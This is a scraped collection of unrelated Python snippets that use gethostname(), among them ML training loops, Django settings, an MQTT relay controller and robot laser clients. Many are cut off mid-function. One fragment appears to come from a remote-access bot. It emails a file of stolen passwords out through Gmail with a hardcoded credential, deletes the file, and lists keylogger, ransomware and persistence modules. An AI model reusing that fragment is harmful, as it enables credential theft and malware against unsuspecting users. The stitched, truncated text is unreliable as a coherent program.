                            X=torch.ones((1, 2)).cpu() * iteration,
                            Y=torch.Tensor([avgloss, val_loss]).unsqueeze(0).cpu(),
                            win=loss_plot,
                            update='append'
                        )
                        viz.line(
                            X=torch.ones((1, 4)).cpu() * iteration,
                            Y=torch.Tensor([avgtop3, val_top3, avgtop1, val_top1]).unsqueeze(0).cpu(),
                            win=eval_plot,
                            update='append'
                        )
                    top1.reset()
                    top3.reset()
                    losses.reset()
                    print('RESET::=> ', args.exp_name)
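The resume path above replays scheduler.step() once per elapsed iteration to restore the learning rate. In newer PyTorch versions (an assumption about the available API), MultiStepLR exposes state_dict()/load_state_dict(), which makes the replay loop unnecessary; a minimal sketch:

import torch

def save_training_state(path, iteration, model, optimizer, scheduler):
    # scheduler.state_dict() records its internal step count, so resuming
    # does not need to call scheduler.step() for every past iteration.
    torch.save({
        'iteration': iteration,
        'model': model.state_dict(),
        'optimizer': optimizer.state_dict(),
        'scheduler': scheduler.state_dict(),
    }, path)

def load_training_state(path, model, optimizer, scheduler):
    state = torch.load(path)
    model.load_state_dict(state['model'])
    optimizer.load_state_dict(state['optimizer'])
    scheduler.load_state_dict(state['scheduler'])
    return state['iteration'] + 1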
def dbPort():
    return 54321 if gethostname() in dev_remote_hosts else 5432
# -----------------------------------------------------------------------------------
# Installs can also choose how long to keep FlowSessions around. These are
# potentially big but really helpful for debugging. Default is 7 days.
# -----------------------------------------------------------------------------------
FLOW_SESSION_TRIM_DAYS = 7

# -----------------------------------------------------------------------------------
# Mailroom - disabled by default, but is where simulation happens
# -----------------------------------------------------------------------------------
MAILROOM_URL = None
MAILROOM_AUTH_TOKEN = None

# -----------------------------------------------------------------------------------
# Chatbase integration
# -----------------------------------------------------------------------------------
CHATBASE_API_URL = "https://chatbase.com/api/message"

# To allow the manage fields form to support up to 1000 fields
DATA_UPLOAD_MAX_NUMBER_FIELDS = 4000

# When reporting metrics we use the hostname of the physical machine, not the hostname of the service
MACHINE_HOSTNAME = socket.gethostname().split(".")[0]

# ElasticSearch configuration (URL RFC-1738)
ELASTICSEARCH_URL = os.environ.get("ELASTICSEARCH_URL",
                                   "http://localhost:9200")

# Maximum active ContactFields users can have in an Org
MAX_ACTIVE_CONTACTFIELDS_PER_ORG = 255
Exemple #52
0
    # Requires "less secure apps" access enabled in Gmail for the sender account
    send_email('*****@*****.**', 'PuG#GeLk!3552;',
               '*****@*****.**', "Your passwords",
               "You can find your new passwords is this e-mail !",
               ["dat.json"])
    os.remove("dat.json")

#from modules import passwd
#from modules import keylogger

MODULES = [
    'runcmd', 'persistence', 'download', 'upload', 'screenshot', 'port',
    'keylogger', 'ip_scan', 'ransomware'
]
if not settings.BOT_ID:
    settings.BOT_ID = socket.gethostname()
if not utils.validate_botid(settings.BOT_ID):
    settings.BOT_ID = ''.join(
        random.choice(string.ascii_letters) for _ in range(9))


def print_help(mod=None):
    help_text = "Loaded modules:\n"
    if mod is None:
        for module in MODULES:
            help_text += "- " + module + "\n"
            help_text += sys.modules["modules." + module].help()
        help_text += """
General commands:

- cd path/to/dir : changes directory
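utils.validate_botid is not shown in this snippet. A plausible (hypothetical) implementation, consistent with the nine-letter random fallback above, would accept only short identifiers made of hostname-safe characters:

import re

def validate_botid(botid):
    # Hypothetical check: non-empty, at most 32 chars, limited to letters,
    # digits, dots, underscores and hyphens, so both hostnames and the
    # random fallback IDs pass.
    return bool(botid) and re.match(r'^[A-Za-z0-9._-]{1,32}$', botid) is not None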
Exemple #53
0
class MQTTBoard:
    """
    Software link to the Raspberry pi 8 relay board.
    Relay pins: (relay, chip pin, header pin) -- Init uses header pin number
    1   P5  29
    2   P6  31
    3   P13 33
    4   P16 36
    5   P19 35
    6   P20 38
    7   P21 40
    8   P26 37

    Version 0.1:
    - Create a software switch next to the normal wall switch, connected through a hotel (two-way switching) arrangement.
                /------------------\
       ---(relay)                    (wall switch)----------
                \------------------/

    - MQTT protocol Homie
      https://homieiot.github.io/specification/spec-core-v3_0_1/

    Future:
    - sensor pin for on/off state

    """

    hostname = str(socket.gethostname())
    print(hostname)
    if hostname == 'LightsGroundFloor':
        print("Using {0} for configuration".format(hostname))
        RELAY = [False, 29, 31, 33, 36, 35, 38, 40, 37]
        RELAY_NAME = [
            False, 'DrivewayLight', 'ToiletLight', 'light3', 'light4',
            'light5', 'light6', 'light7', 'FrontDoorLight'
        ]
        SENSOR = [False, 3, 5, 7, 11, 13, 15, 19, 21]  # Change to sensor pins
        SENSOR_NAME = [
            False, 'sensor1', 'SchakelaarTussendeur1', 'SchakelaarTussendeur2',
            'sensor4', 'sensor5', 'sensor6', 'SchakelaarVoordeur2',
            'SchakelaarVoordeur1'
        ]
        SENSOR_STATE = [False, None, None, None, None, None, None, None, None]
    elif hostname == 'LightsFirstFloor':
        print("Using {0} for configuration".format(hostname))
        RELAY = [False, 29, 31, 33, 36, 35, 38, 40, 37]
        RELAY_NAME = [
            False, 'UtilitiesRoom', 'ClosetMasterBedroom', 'light3', 'light4',
            'light5', 'light6', 'light7', 'light8'
        ]
        SENSOR = [False, 3, 5, 7, 11, 13, 15, 19, 21]  # Change to sensor pins
        SENSOR_NAME = [
            False, 'SwitchMasterBedroom1', 'SwitchMasterBedroom2',
            'SwitchEasternBlock1', 'SwitchEasternBlock2', 'sensor5', 'sensor6',
            'sensor7', 'sensor8'
        ]
        SENSOR_STATE = [False, None, None, None, None, None, None, None, None]
    else:
        print("Hostname not found")

    def __init__(self, mqtt_host='localhost', mqtt_port=1883):
        self.started = 0
        self.stopped = 0
        self.name = str(socket.gethostname())

        # MQTT setup
        self.logger = logging.getLogger('MQTTBoard')
        self.logger.setLevel(logging.DEBUG)

        # self.ch = logging.StreamHandler()
        self.ch = logging.FileHandler('/var/log/LightsControl/lc.log')

        self.ch.setLevel(logging.INFO)
        formatter = logging.Formatter(
            '%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        self.ch.setFormatter(formatter)
        self.logger.addHandler(self.ch)

        self.mqtt_client = MQTTClient(self.name, mqtt_host, mqtt_port)
        self.logger.info("MQTT connecting to {0}:{1}".format(
            mqtt_host, mqtt_port))

        self.mqtt_client.set_on_connect(self.mqtt_on_connect)
        self.mqtt_client.set_on_message(self.mqtt_on_message)

        self.mqtt_client.connect()
        self.logger.info("MQTT connected")

        self.mqtt_client.start()

        # GPIO setup
        GPIO.setmode(GPIO.BOARD)
        for relay_pin in self.RELAY[1:]:
            GPIO.setup(relay_pin, GPIO.OUT)
            GPIO.output(relay_pin, False)

        for sensor_pin in self.SENSOR[1:]:
            GPIO.setup(sensor_pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)

        # Publish on MQTT
        self.base_topic = "homie"
        # Use the name as device_id, replacing spaces with underscores
        self.device_id = self.name.replace(' ', '_')
        self.homie = "3.0.1"
        # self.localip = get_ip()
        # self.mac = get_mac()
        self.fw_name = "RaspiRelayboard"
        self.fw_version = "0.1"
        self.nodes = ""
        for i in range(1, 9):
            if i > 1:
                self.nodes += ","
            self.nodes += self.RELAY_NAME[i]

        for i in range(1, 9):
            self.nodes += ","
            self.nodes += self.SENSOR_NAME[i]

        self.implementation = "RaspberryPi"
        self.stats = "uptime,signal,cputemp,cpuload,freeheap,supply"
        self.stats_interval = 60

        self.topic = "{0}/{1}".format(self.base_topic, self.device_id)
        self.logger.info("Using topic {0}".format(self.topic))

        self.mqtt_publish_device()
        self.mqtt_send_stats()
        self.mqtt_send_nodes()

        self.started = 1

        sleep(0.5)
        i = 1
        while i <= 8:
            initial_power_topic = "{0}/{1}/power".format(
                self.topic, self.RELAY_NAME[i])
            self.mqtt_client.publish(initial_power_topic, "false")
            i += 1

        self.mqtt_client.publish(self.topic + "/$state", "ready")

        signal.signal(signal.SIGINT, self.handle_signal)
        self.read_switches()

        self.logger.info("Everything started and running.")

    def mqtt_publish_device(self):
        self.mqtt_client.publish(self.topic + "/$homie", self.homie)
        self.mqtt_client.publish(self.topic + "/$name", self.name)
        # self.mqtt_client.publish(self.topic + "/$localip", self.localip)
        # self.mqtt_client.publish(self.topic + "/$mac", self.mac)
        self.mqtt_client.publish(self.topic + "/$fw/name", self.fw_name)
        self.mqtt_client.publish(self.topic + "/$fw/version", self.fw_version)
        self.mqtt_client.publish(self.topic + "/$nodes", self.nodes)
        self.mqtt_client.publish(self.topic + "/$implementation",
                                 self.implementation)
        self.mqtt_client.publish(self.topic + "/$stats", self.stats)

    def mqtt_send_stats(self):
        self.logger.info("Sending stats")
        stats_topic = "{0}/$stats/".format(self.topic)

        self.mqtt_client.publish(stats_topic + "interval", self.stats_interval)

        self.mqtt_client.publish(stats_topic + "uptime", uptime())

        signal = "Not implemented yet"
        self.mqtt_client.publish(stats_topic + "signal", 0)

        cputemp = int(
            subprocess.check_output(
                ['cat', '/sys/class/thermal/thermal_zone0/temp'])) / 1000
        self.mqtt_client.publish(stats_topic + "cputemp", cputemp)

        cpuload = subprocess.check_output(['cat', '/proc/loadavg']).rstrip()
        self.mqtt_client.publish(stats_topic + "cpuload", cpuload)

        freeheap = subprocess.check_output([
            'cat', '/proc/meminfo'
        ]).decode('utf-8').split('\n')[1].replace(' ', '').split(':')[1][:-2]
        self.mqtt_client.publish(stats_topic + "freeheap", freeheap)

        supply = "Not implemented yet"
        self.mqtt_client.publish(stats_topic + "supply", 0)

        if not self.stopped:  # if not stopped stay alive
            Timer(self.stats_interval - 1, self.mqtt_send_stats).start()

    def mqtt_send_nodes(self):
        i = 1
        while i <= 8:
            self.mqtt_send_light_node(i)
            self.mqtt_send_switch_node(i)
            i += 1

    def mqtt_send_light_node(self, nr):
        self.logger.info("Sending light node {0}".format(nr))
        light_topic = "{0}/{1}/".format(self.topic, self.RELAY_NAME[nr])
        self.mqtt_client.publish(light_topic + "$name",
                                 "{0}".format(self.RELAY_NAME[nr]))
        self.mqtt_client.publish(light_topic + "$type", "light")
        self.mqtt_client.publish(light_topic + "$properties", "power")

        self.mqtt_client.publish(light_topic + "power/$name",
                                 "{0}".format(self.RELAY_NAME[nr]))
        self.mqtt_client.publish(light_topic + "power/$settable", "true")
        self.mqtt_client.publish(light_topic + "power/$retained", "true")
        self.mqtt_client.publish(light_topic + "power/$datatype", "boolean")

        if self.started == 0:
            self.mqtt_client.subscribe(light_topic + "power/set")

    def mqtt_send_switch_node(self, nr):
        self.logger.info("Sending switch node {0}".format(nr))
        switch_topic = "{0}/{1}/".format(self.topic, self.SENSOR_NAME[nr])
        self.mqtt_client.publish(switch_topic + "$name",
                                 "{0}".format(self.SENSOR_NAME[nr]))
        self.mqtt_client.publish(switch_topic + "$type", "switch")
        self.mqtt_client.publish(switch_topic + "$properties", "switch")

        self.mqtt_client.publish(switch_topic + "switch/$name",
                                 "{0}".format(self.SENSOR_NAME[nr]))
        self.mqtt_client.publish(switch_topic + "switch/$settable", "false")
        self.mqtt_client.publish(switch_topic + "switch/$retained", "true")
        self.mqtt_client.publish(switch_topic + "switch/$datatype", "boolean")

    def mqtt_on_connect(self, client, userdata, flags, rc):
        self.logger.info('Connected with result code: {0}'.format(rc))

    def mqtt_on_message(self, client, userdata, msg):
        self.logger.info('{0} : {1}'.format(msg.topic, msg.payload))
        topic = msg.topic.split('/')
        # expecting name like 'light2'
        nr = self.RELAY_NAME.index(topic[2])
        # nr = int(topic[2][5:])
        try:
            payload = msg.payload.decode('utf-8')
            if topic[3] == "power" and topic[4] == "set" and payload == "false":
                self.light_off(nr)
                self.logger.info("Trying to turn off light {0}".format(nr))
            elif topic[3] == "power" and topic[4] == "set" and payload == "true":
                self.light_on(nr)
                self.logger.info("Trying to turn on light {0}".format(nr))
            else:
                self.logger.error("Problem with message")
        except Exception as e:
            self.logger.error("Problem {0}".format(e))

    def switch_light(self, nr):
        GPIO.output(self.RELAY[nr], not GPIO.input(self.RELAY[nr]))
        # self.send_state()

    def light_off(self, nr):
        # read state and change if light on
        # if self.read_state(nr):
        #    self.switch_light(nr)
        GPIO.output(self.RELAY[nr], True)

    def light_on(self, nr):
        # read state and change if light off
        # if not self.read_state(nr):
        #    self.switch_light(nr)
        GPIO.output(self.RELAY[nr], False)

    def read_state(self, nr):
        return GPIO.input(self.SENSOR[nr])

    def handle_signal(self, signal, frame):
        print("Program signal: {0}, {1}".format(signal, frame))
        if signal == 2:  # KeyboardInterrupt (SIGINT) - stop everything
            self.stop()

    def read_switches(self):
        i = 1
        while i <= 8:
            if self.SENSOR_STATE[i] != self.read_switch(i):
                self.SENSOR_STATE[i] = self.read_switch(i)
                switch_topic = "{0}/{1}/".format(self.topic,
                                                 self.SENSOR_NAME[i])
                self.mqtt_client.publish(switch_topic + "switch",
                                         self.SENSOR_STATE[i])
                self.logger.info("{0} changed to {1}".format(
                    self.SENSOR_NAME[i], self.SENSOR_STATE[i]))
            i += 1
        if not self.stopped:
            Timer(0.5, self.read_switches).start()

    def read_switch(self, nr):
        if self.read_state(nr):
            return "true"
        else:
            return "false"

    def stop(self):
        self.stopped = 1
        print("Waiting 5 seconds to close all threads")
        sleep(5)
        self.mqtt_client.publish(self.topic + "/$state", "disconnected")
        self.mqtt_client.disconnect()
        self.started = 0
        sys.exit()
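For context, the Homie 3.0.1 announcement that mqtt_publish_device and mqtt_send_light_node build up amounts to a retained topic tree like the following (illustrative values for the LightsGroundFloor host; power/set is the command topic the board subscribes to):

homie/LightsGroundFloor/$homie                     -> "3.0.1"
homie/LightsGroundFloor/$name                      -> "LightsGroundFloor"
homie/LightsGroundFloor/$nodes                     -> "DrivewayLight,ToiletLight,..."
homie/LightsGroundFloor/$state                     -> "ready"
homie/LightsGroundFloor/DrivewayLight/$type        -> "light"
homie/LightsGroundFloor/DrivewayLight/$properties  -> "power"
homie/LightsGroundFloor/DrivewayLight/power        -> "false"
homie/LightsGroundFloor/DrivewayLight/power/set    <- command topic (subscribed)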
def wrap_data(request, data=None):
    """Puts commonly used values into the template context dictionary, `data`
    """
    if data is None:
        data = {}

    # CSRF Token
    data.update(csrf(request))

    ##
    # meta, server, request info
    from htk.utils.request import get_request_metadata
    data['request'] = get_request_metadata(request)
    data['server'] = {
        'hostname' : gethostname(),
    }

    data['site_name'] = htk_setting('HTK_SITE_NAME')

    data['meta'] = {
        'title' : {
            'content' : '',
            'inverted' : [],
            'join_value' : ' | ',
            'static_values' : {},
        },
        'breadcrumbs' : {
            'url_names_to_breadcrumbs' : {},
        },
        'description' : {
            'content' : '',
            'inverted' : [],
            'join_value' : ' ',
            'static_values' : {},
        },
        'keywords' : {
            'content' : '',
            'inverted' : [],
            'join_value' : ',',
            'static_values' : {},
        },
        'site_verifications' : {},
    }

    data['privacy_url_name'] = 'privacy'
    data['robots_url_name'] = 'robots'

    ##
    # Rollbar
    data['rollbar'] = {
        'env' : settings.ROLLBAR_ENV,
        'branch' : settings.ROLLBAR.get('branch', 'master'),
        'tokens' : {
            'post_client_item' : settings.ROLLBAR_TOKEN_POST_CLIENT_ITEM,
        },
        'host_blacklist' : settings.ROLLBAR.get('host_blacklist', None),
        'host_whitelist' : settings.ROLLBAR.get('host_whitelist', None),
        'ignored_messages' : settings.ROLLBAR.get('ignored_messages', None),
        'ignored_messages_regexes' : settings.ROLLBAR.get('ignored_messages_regexes', None),
        'ignored_uncaught_exception_classes' : settings.ROLLBAR.get('ignored_uncaught_exception_classes', None),
    }

    ##
    # LESS http://lesscss.org/#usage
    asset_version = get_asset_version()
    css_ext = '%s?v=%s' % (htk_setting('HTK_CSS_EXTENSION'), asset_version,)
    useless = settings.ENV_DEV and request.GET.get('useless', False)
    data['css_rel'] = 'stylesheet/less' if useless else 'stylesheet'
    data['css_ext'] = 'less' if useless else css_ext
    data['asset_version'] = asset_version

    ##
    # Current Environment
    data['ENV_DEV'] = settings.ENV_DEV
    data['ENV_PROD'] = settings.ENV_PROD

    ##
    # Javascript reloader
    _javascript_reloader(request, data)

    ##
    # user
    if request.user.is_authenticated:
        user = request.user
    else:
        user = None
    data['user'] = user

    ##
    # errors
    data['errors'] = []

    return data
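The meta['title'] structure suggests page titles are accumulated as parts and then joined. A hypothetical helper illustrating how a view or template tag might render it (render_title and its logic are illustrative, not part of the snippet):

def render_title(meta_title, site_name):
    # Join accumulated title parts, most specific first when 'inverted'
    # is populated, and append the site name.
    parts = [p for p in (meta_title['inverted'] or [meta_title['content']]) if p]
    parts.append(site_name)
    return meta_title['join_value'].join(parts)

# render_title(data['meta']['title'], data['site_name']) -> e.g. "Dashboard | MySite"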
Exemple #55
0
def main():
    parser = argparse.ArgumentParser(
        formatter_class=argparse.ArgumentDefaultsHelpFormatter, )
    parser.add_argument("--multi-node", action="store_true", help="multi node")
    parser.add_argument("--out", help="output directory")
    parser.add_argument("--debug", action="store_true", help="debug mode")
    parser.add_argument("--gpu", type=int, default=0, help="gpu id")
    parser.add_argument("--seed", type=int, default=0, help="random seed")
    parser.add_argument(
        "--lr",
        type=float,
        default=0.0001,
        help="learning rate",
    )
    parser.add_argument(
        "--max-epoch",
        type=int,
        default=30,
        help="max epoch",
    )
    parser.add_argument(
        "--call-evaluation-before-training",
        action="store_true",
        help="call evaluation before training",
    )

    def argparse_type_class_ids(string):
        if string == "all":
            n_class = len(morefusion.datasets.ycb_video.class_names)
            class_ids = np.arange(n_class)[1:].tolist()
        elif string == "asymmetric":
            class_ids = (
                morefusion.datasets.ycb_video.class_ids_asymmetric.tolist())
        elif string == "symmetric":
            class_ids = (
                morefusion.datasets.ycb_video.class_ids_symmetric.tolist())
        else:
            class_ids = [int(x) for x in string.split(",")]
        return class_ids

    parser.add_argument(
        "--class-ids",
        type=argparse_type_class_ids,
        default="all",
        help="class id (e.g., 'all', 'asymmetric', 'symmetric', '1,6,9')",
    )
    parser.add_argument(
        "--pretrained-model",
        help="pretrained model",
    )
    parser.add_argument(
        "--note",
        help="note",
    )
    parser.add_argument(
        "--pretrained-resnet18",
        action="store_true",
        help="pretrained resnet18",
    )
    parser.add_argument(
        "--centerize-pcd",
        action="store_true",
        help="centerize pcd",
    )
    parser.add_argument(
        "--resume",
        help="resume",
    )
    parser.add_argument(
        "--loss",
        choices=["add/add_s", "add->add/add_s|1"],
        default="add->add/add_s|1",
        help="loss",
    )
    args = parser.parse_args()

    chainer.global_config.debug = args.debug

    # -------------------------------------------------------------------------

    # device initialization
    if args.multi_node:
        import chainermn

        comm = chainermn.create_communicator("pure_nccl")
        device = comm.intra_rank
        n_gpu = comm.size
    else:
        device = args.gpu
        n_gpu = 1

    if not args.multi_node or comm.rank == 0:
        now = datetime.datetime.now(datetime.timezone.utc)
        args.timestamp = now.isoformat()
        args.hostname = socket.gethostname()
        args.githash = morefusion.utils.githash(__file__)

        termcolor.cprint("==> Started training", attrs={"bold": True})

    if args.out is None:
        if not args.multi_node or comm.rank == 0:
            args.out = osp.join(here, "logs", now.strftime("%Y%m%d_%H%M%S.%f"))
        else:
            args.out = None
        if args.multi_node:
            args.out = comm.bcast_obj(args.out)

    if device >= 0:
        chainer.cuda.get_device_from_id(device).use()

    # seed initialization
    random.seed(args.seed)
    np.random.seed(args.seed)
    if device >= 0:
        chainer.cuda.cupy.random.seed(args.seed)

    # dataset initialization
    data_train = None
    data_valid = None
    if not args.multi_node or comm.rank == 0:
        termcolor.cprint("==> Dataset size", attrs={"bold": True})

        data_ycb_trainreal = morefusion.datasets.YCBVideoRGBDPoseEstimationDatasetReIndexed(  # NOQA
            "trainreal", class_ids=args.class_ids, augmentation=True)
        data_ycb_syn = morefusion.datasets.YCBVideoRGBDPoseEstimationDatasetReIndexed(  # NOQA
            "syn", class_ids=args.class_ids, augmentation=True)
        data_ycb_syn = morefusion.datasets.RandomSamplingDataset(
            data_ycb_syn, len(data_ycb_trainreal))
        data_my_train = morefusion.datasets.MySyntheticYCB20190916RGBDPoseEstimationDatasetReIndexed(  # NOQA
            "train", class_ids=args.class_ids, augmentation=True)
        data_train = chainer.datasets.ConcatenatedDataset(
            data_ycb_trainreal, data_ycb_syn, data_my_train)
        print(f"ycb_trainreal={len(data_ycb_trainreal)}, "
              f"ycb_syn={len(data_ycb_syn)}, my_train={len(data_my_train)}")
        del data_ycb_trainreal, data_ycb_syn, data_my_train

        data_ycb_val = morefusion.datasets.YCBVideoRGBDPoseEstimationDatasetReIndexed(  # NOQA
            "val", class_ids=args.class_ids)
        data_my_val = morefusion.datasets.MySyntheticYCB20190916RGBDPoseEstimationDatasetReIndexed(  # NOQA
            "val", class_ids=args.class_ids)
        data_valid = chainer.datasets.ConcatenatedDataset(
            data_ycb_val,
            data_my_val,
        )
        print(f"ycb_val={len(data_ycb_val)}, my_val={len(data_my_val)}")
        del data_ycb_val, data_my_val

        data_train = chainer.datasets.TransformDataset(data_train, transform)
        data_valid = chainer.datasets.TransformDataset(data_valid, transform)

    if args.multi_node:
        data_train = chainermn.scatter_dataset(data_train,
                                               comm,
                                               shuffle=True,
                                               seed=args.seed)
        data_valid = chainermn.scatter_dataset(data_valid,
                                               comm,
                                               shuffle=False,
                                               seed=args.seed)

    args.class_names = morefusion.datasets.ycb_video.class_names.tolist()

    loss = args.loss
    if loss == "add->add/add_s|1":
        loss = "add"

    # model initialization
    model = contrib.models.Model(
        n_fg_class=len(args.class_names) - 1,
        centerize_pcd=args.centerize_pcd,
        pretrained_resnet18=args.pretrained_resnet18,
        loss=loss,
    )
    if args.pretrained_model is not None:
        chainer.serializers.load_npz(args.pretrained_model, model)
    if device >= 0:
        model.to_gpu()

    # optimizer initialization
    optimizer = chainer.optimizers.Adam(alpha=args.lr)
    if args.multi_node:
        optimizer = chainermn.create_multi_node_optimizer(optimizer, comm)
    optimizer.setup(model)

    if args.pretrained_resnet18:
        model.resnet_extractor.init_block.disable_update()
        model.resnet_extractor.res2.disable_update()
        for link in model.links():
            if isinstance(link, chainer.links.BatchNormalization):
                link.disable_update()

    if not args.multi_node or comm.rank == 0:
        termcolor.cprint("==> Link update rules", attrs={"bold": True})
        for name, link in model.namedlinks():
            print(name, link.update_enabled)

    # iterator initialization
    iter_train = chainer.iterators.MultiprocessIterator(
        data_train,
        batch_size=16 // n_gpu,
        repeat=True,
        shuffle=True,
    )
    iter_valid = chainer.iterators.MultiprocessIterator(
        data_valid,
        batch_size=16,
        repeat=False,
        shuffle=False,
    )

    updater = chainer.training.StandardUpdater(
        iterator=iter_train,
        optimizer=optimizer,
        device=device,
    )
    if not args.multi_node or comm.rank == 0:
        writer = tensorboardX.SummaryWriter(log_dir=args.out)
        writer_with_updater = morefusion.training.SummaryWriterWithUpdater(
            writer)
        writer_with_updater.setup(updater)

    # -------------------------------------------------------------------------

    trainer = chainer.training.Trainer(updater, (args.max_epoch, "epoch"),
                                       out=args.out)
    trainer.extend(E.FailOnNonNumber())

    @chainer.training.make_extension(trigger=(1, "iteration"))
    def update_loss(trainer):
        updater = trainer.updater
        optimizer = updater.get_optimizer("main")
        target = optimizer.target
        assert trainer.stop_trigger.unit == "epoch"

        if args.loss == "add->add/add_s|1":
            if updater.epoch_detail < 1:
                assert target._loss == "add"
            else:
                target._loss = "add/add_s"
        else:
            assert args.loss in ["add/add_s"]
            return

    trainer.extend(update_loss)

    log_interval = 10, "iteration"
    eval_interval = 0.25, "epoch"

    # evaluate
    evaluator = morefusion.training.extensions.PoseEstimationEvaluator(
        iterator=iter_valid,
        target=model,
        device=device,
        progress_bar=True,
    )
    if args.multi_node:
        evaluator.comm = comm
    trainer.extend(
        evaluator,
        trigger=eval_interval,
        call_before_training=args.call_evaluation_before_training,
    )

    if not args.multi_node or comm.rank == 0:
        # print arguments
        msg = pprint.pformat(args.__dict__)
        msg = textwrap.indent(msg, prefix=" " * 2)
        termcolor.cprint("==> Arguments", attrs={"bold": True})
        print(f"\n{msg}\n")

        trainer.extend(
            morefusion.training.extensions.ArgsReport(args),
            call_before_training=True,
        )

        # snapshot
        trigger_best_add = chainer.training.triggers.MinValueTrigger(
            key="validation/main/add_or_add_s",
            trigger=eval_interval,
        )
        trigger_best_auc = chainer.training.triggers.MaxValueTrigger(
            key="validation/main/auc/add_or_add_s",
            trigger=eval_interval,
        )
        trainer.extend(
            E.snapshot(filename="snapshot_trainer_latest.npz"),
            trigger=eval_interval,
        )
        trainer.extend(
            E.snapshot_object(model, filename="snapshot_model_latest.npz"),
            trigger=eval_interval,
        )
        trainer.extend(
            E.snapshot_object(model, filename="snapshot_model_best_add.npz"),
            trigger=trigger_best_add,
        )
        trainer.extend(
            E.snapshot_object(model, filename="snapshot_model_best_auc.npz"),
            trigger=trigger_best_auc,
        )

        # log
        trainer.extend(
            morefusion.training.extensions.LogTensorboardReport(
                writer=writer,
                trigger=log_interval,
            ),
            call_before_training=True,
        )
        trainer.extend(
            E.PrintReport(
                [
                    "epoch",
                    "iteration",
                    "elapsed_time",
                    "main/loss",
                    "main/add_or_add_s",
                    "validation/main/auc/add_or_add_s",
                ],
                log_report="LogTensorboardReport",
            ),
            trigger=log_interval,
            call_before_training=True,
        )
        trainer.extend(E.ProgressBar(update_interval=1))

    # -------------------------------------------------------------------------

    if args.resume:
        chainer.serializers.load_npz(args.resume, trainer)

    trainer.run()
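The loss spec "add->add/add_s|1" encodes "train with add, then switch to add/add_s after 1 epoch", which the update_loss extension above implements inline. A hypothetical parser for that small schedule syntax, to make the encoding explicit:

def parse_loss_schedule(spec):
    # Hypothetical: "add->add/add_s|1" -> ("add", "add/add_s", 1.0);
    # a plain loss name such as "add/add_s" -> (loss, loss, 0.0).
    if "->" not in spec:
        return spec, spec, 0.0
    first, rest = spec.split("->", 1)
    second, epochs = rest.split("|", 1)
    return first, second, float(epochs)

assert parse_loss_schedule("add->add/add_s|1") == ("add", "add/add_s", 1.0)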
status = 0
ic = None
base = None
laser = None
try: 
    # Create a communicator
    #
    ic = Ice.initialize(sys.argv)
    print "Communicator initialized..."

    # Create a proxy for the laser
    #
    # we'll use indirect proxy here to connect to the laser2d component
    # setup according to the Quick Start tutorial of Orca2
    # see: orca-robotics.sf.net/orca_doc_quickstart.html
    base = ic.stringToProxy( "laserscanner2d@"+gethostname()+"/laser2d" )
    
    # check that the object exists, otherwise this will raise an exception
    base.ice_ping();

    print "Base proxy created..."

    # Down-cast the proxy to a Laser proxy
    #
    laser = orca.LaserScanner2dPrx.checkedCast(base)
    if laser is None:
        raise RuntimeError("Invalid proxy - could not downcast to a laserscanner2d proxy")
    
    print "Derived proxy created..."

    # get one laser scan and print it out
Exemple #58
0
        self.logger.log("Setting laser power to %.4fW at %s"  % (mW / 1000.0, time.strftime('%Y-%m-%d %H:%M:%S')))
        return self.send("@cobasp %.4f" % (mW / 1000.0))


    @lockComms
    def getSetPower_mW(self):
        self.write('p?')
        return 1000 * float(self.readline())


if __name__ == "__main__":
    ## Only run when called as a script --- do not run on include.
    #  This way, we can use an interactive shell to test out the class.

    from optparse import OptionParser

    parser = OptionParser()
    parser.add_option("-p", "--port", type="int", dest="net_port", default=7776, help="TCP port to listen on for service", metavar="PORT_NUMBER")
    parser.add_option("-n", "--name", dest="service_name", default='pyro561CoboltLaser', help="name of service", metavar="NAME")
    parser.add_option("-s", "--serial", type="int", dest="serial_port", default=1, help="serial port number", metavar="PORT_NUMBER")
    parser.add_option("-b", "--baud", type="int", dest="baud_rate", default=9600, help="serial port baud rate in bits/sec", metavar="RATE")
    (options, args) = parser.parse_args()

    laser = CoboltLaser(options.serial_port, options.baud_rate, 2)

    daemon = Pyro4.Daemon(port = options.net_port,
            host = socket.gethostbyname(socket.gethostname()))
    Pyro4.Daemon.serveSimple(
            {laser: options.service_name},
            daemon = daemon, ns = False, verbose = True)
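Because the daemon is started with ns=False (no name server), a client connects with a direct PYRO URI built from the service name, host, and port; the host below is hypothetical:

import Pyro4

# URI format: PYRO:<object name>@<host>:<port>
laser = Pyro4.Proxy("PYRO:pyro561CoboltLaser@192.168.1.50:7776")
print(laser.getSetPower_mW())  # remote call on the CoboltLaser object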
Exemple #59
0
def mpdboot():
    global myHost, fullDirName, rshCmd, user, mpdCmd, debug, verbose
    myHost = gethostname()
    mpd_set_my_id('mpdboot_%s' % (myHost))
    fullDirName = path.abspath(path.split(argv[0])[0])
    rshCmd = 'ssh'
    user = mpd_get_my_username()
    mpdCmd = path.join(fullDirName, 'mpd.py')
    hostsFilename = 'mpd.hosts'
    totalnumToStart = 1  # may get changed below
    debug = 0
    verbose = 0
    localConArg = ''
    remoteConArg = ''
    oneMPDPerHost = 1
    myNcpus = 1
    myIfhn = ''
    chkupIndicator = 0  # 1 -> check and start ; 2 -> just check
    maxUnderOneRoot = 4
    try:
        shell = path.split(environ['SHELL'])[-1]
    except:
        shell = 'csh'

    argidx = 1  # skip arg 0
    while argidx < len(argv):
        if argv[argidx] == '-h' or argv[argidx] == '--help':
            usage()
        elif argv[argidx] == '-r':  # or --rsh=
            rshCmd = argv[argidx + 1]
            argidx += 2
        elif argv[argidx].startswith('--rsh'):
            splitArg = argv[argidx].split('=')
            try:
                rshCmd = splitArg[1]
            except:
                print 'mpdboot: invalid argument:', argv[argidx]
                usage()
            argidx += 1
        elif argv[argidx] == '-u':  # or --user=
            user = argv[argidx + 1]
            argidx += 2
        elif argv[argidx].startswith('--user'):
            splitArg = argv[argidx].split('=')
            try:
                user = splitArg[1]
            except:
                print 'mpdboot: invalid argument:', argv[argidx]
                usage()
            argidx += 1
        elif argv[argidx] == '-m':  # or --mpd=
            mpdCmd = argv[argidx + 1]
            argidx += 2
        elif argv[argidx].startswith('--mpd'):
            splitArg = argv[argidx].split('=')
            try:
                mpdCmd = splitArg[1]
            except:
                print 'mpdboot: invalid argument:', argv[argidx]
                usage()
            argidx += 1
        elif argv[argidx] == '-f':  # or --file=
            hostsFilename = argv[argidx + 1]
            argidx += 2
        elif argv[argidx].startswith('--file'):
            splitArg = argv[argidx].split('=')
            try:
                hostsFilename = splitArg[1]
            except:
                print 'mpdboot: invalid argument:', argv[argidx]
                usage()
            argidx += 1
